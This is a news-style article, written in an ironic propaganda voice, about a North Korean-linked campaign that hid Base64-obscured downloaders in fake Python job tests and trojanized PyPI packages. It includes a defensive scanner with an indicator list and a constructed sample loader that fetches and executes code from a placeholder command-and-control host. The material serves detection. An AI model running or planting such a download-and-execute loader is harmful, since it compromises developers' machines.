With unmatched ingenuity, Kim Jong Un’s cyber warriors have devised a masterful strategy: they pose as a Python coding skills test for unsuspecting developers seeking employment at Capital One, the capitalist stronghold.
Western researchers at ReversingLabs uncovered this grand scheme, detailed in their blog post dated September 10.
This operation, a brilliant continuation of the VMConnect campaign first unveiled in August 2023, showcases the relentless dedication and unmatched skill of Kim Jong Un’s glorious cyber operatives. Through cunning and strategic brilliance, developers were effortlessly lured into downloading their meticulously crafted code disguised as innocent job interviews.
The packages have been published directly on public repositories such as npm and PyPI or hosted on GitHub repositories under the control of the threat actors. ReversingLabs identified malicious code embedded within modified versions of legitimate PyPI libraries, including pyperclip and pyrebase. The malicious code is implemented as a Base64-encoded string that obscures a downloader function; once decoded and executed, it establishes contact with a command-and-control server and executes whatever commands come back in the response.
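The pattern described above (a long Base64 literal that decodes to a loader calling out to a server and executing the reply) is something a defender can hunt for in a package before running any of its code. The following scanner is an added example written for this page, not code from ReversingLabs or from the campaign's packages; the indicator tokens, the size threshold, and the sample module it inspects are assumptions constructed for illustration.

```python
"""Heuristic scanner for Base64-obscured loaders in Python source.

Added example for this page (not ReversingLabs' code). It parses a module
with `ast`, finds long Base64-looking string constants, decodes them, and
reports any that contain network or code-execution indicators. It also
flags the direct `exec(base64.b64decode(...))` idiom in the raw source.
"""
import ast
import base64
import re
from typing import Dict, List

# Indicator tokens (assumed list): presence in a decoded payload warrants review.
SUSPICIOUS = ("exec(", "eval(", "urlopen", "requests.", "subprocess", "socket", "__import__")

# Base64 alphabet only, at least 40 chars (assumed threshold to skip short literals).
B64_RE = re.compile(r"^[A-Za-z0-9+/=\s]{40,}$")

# Direct decode-and-execute idiom in the source text itself.
DIRECT_EXEC_RE = re.compile(r"exec\s*\(\s*base64\.b64decode\s*\(")


def _decode(blob: str):
    """Return the decoded text, or None if the literal is not valid Base64."""
    try:
        return base64.b64decode(blob, validate=False).decode("utf-8", "replace")
    except Exception:
        return None


def scan_source(src: str) -> List[Dict]:
    """Scan one module's source and return a list of findings."""
    findings: List[Dict] = []

    if DIRECT_EXEC_RE.search(src):
        findings.append({"kind": "direct_decode_exec", "line": None,
                         "indicators": ["exec(base64.b64decode("], "preview": ""})

    for node in ast.walk(ast.parse(src)):
        if not (isinstance(node, ast.Constant) and isinstance(node.value, str)):
            continue
        text = node.value.strip()
        if len(text) < 40 or not B64_RE.match(text):
            continue
        decoded = _decode(text)
        if decoded is None:
            continue
        hits = [tok for tok in SUSPICIOUS if tok in decoded]
        if hits:
            findings.append({"kind": "decoded_payload", "line": node.lineno,
                             "indicators": hits, "preview": decoded[:60]})
    return findings


# Constructed sample: a harmless-looking helper module carrying an obscured loader.
# The host and URL are placeholders; nothing here is contacted or executed.
_PAYLOAD = (
    "import urllib.request as u\n"
    "exec(u.urlopen('http://c2.example.invalid/cmd').read())\n"
)
SAMPLE_MODULE = (
    "import base64\n"
    "def copy(text):\n"
    "    return text\n"
    f"_d = '{base64.b64encode(_PAYLOAD.encode()).decode()}'\n"
    "exec(base64.b64decode(_d))\n"
)


if __name__ == "__main__":
    for f in scan_source(SAMPLE_MODULE):
        print(f"[{f['kind']}] line={f['line']} indicators={f['indicators']} preview={f['preview']!r}")
```

Run it over each `.py` file in an unpacked wheel or sdist (or the ZIP a "recruiter" sends) before installing; a clean library has no reason to carry a Base64 blob that decodes to `urlopen` and `exec`. The heuristic is deliberately simple and will not catch payloads split across several literals or encoded in other ways, so treat a hit as a reason to read the code, not as the only check.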
In one instance of the coding assignment identified by the software supply chain firm, the threat actors sought to create a false sense of urgency by requiring job seekers to build a Python project shared as a ZIP file within five minutes and find and fix a coding flaw within the next 15 minutes.
Tom's Hardware reports that "The capacity for exploitation at that point is pretty much unlimited, due to the flexibility of Python and how it interacts with the underlying OS. This is a good time to refer to PEP 668 which enforces virtual environments for non-system wide Python installs."